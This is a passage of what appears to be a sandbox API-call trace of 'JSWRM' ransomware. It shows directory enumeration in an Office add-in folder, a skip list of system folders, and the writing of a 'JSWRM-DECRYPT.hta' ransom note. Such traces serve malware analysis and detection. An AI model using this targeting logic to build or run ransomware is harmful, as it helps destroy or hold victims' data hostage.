(lpString1="ro", lpString2="documents and settings") returned 1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="$RECYCLE.BIN") returned 1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="system volume information") returned -1 [0125.147] lstrcmpiW (lpString1="ro", lpString2="msocache") returned 1 [0125.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0125.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0125.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0125.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0125.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0125.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ro\\jswrm-decrypt.hta")) returned 0xffffffff [0125.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0125.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0125.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ro\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.149] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.149] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.151] CloseHandle (hObject=0x314) returned 1 [0125.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0125.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0125.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0125.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0125.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0125.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ro\\jswrm-decrypt.hta")) returned 0x20 [0125.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0125.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0125.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0125.152] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ro\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6ac83cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41411e54, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0125.152] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.152] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6ac83cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41411e54, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.152] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aa3169, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aa3169, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4c60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.152] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.152] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.152] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.152] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.152] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.153] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.153] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.153] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.153] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.153] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0125.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0125.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0125.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0125.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.153] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41411e54, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41411e54, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41411e54, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0125.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0125.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0125.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0125.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0125.154] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6aee686, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6aee686, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.154] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0125.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0125.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0125.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.225] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaac403, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaac403, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.225] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0125.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0125.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0125.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0125.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.226] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x98ae9c2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x98ae9c2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x98ae9c2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50b8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.226] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0125.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0125.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0125.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0125.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0125.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: 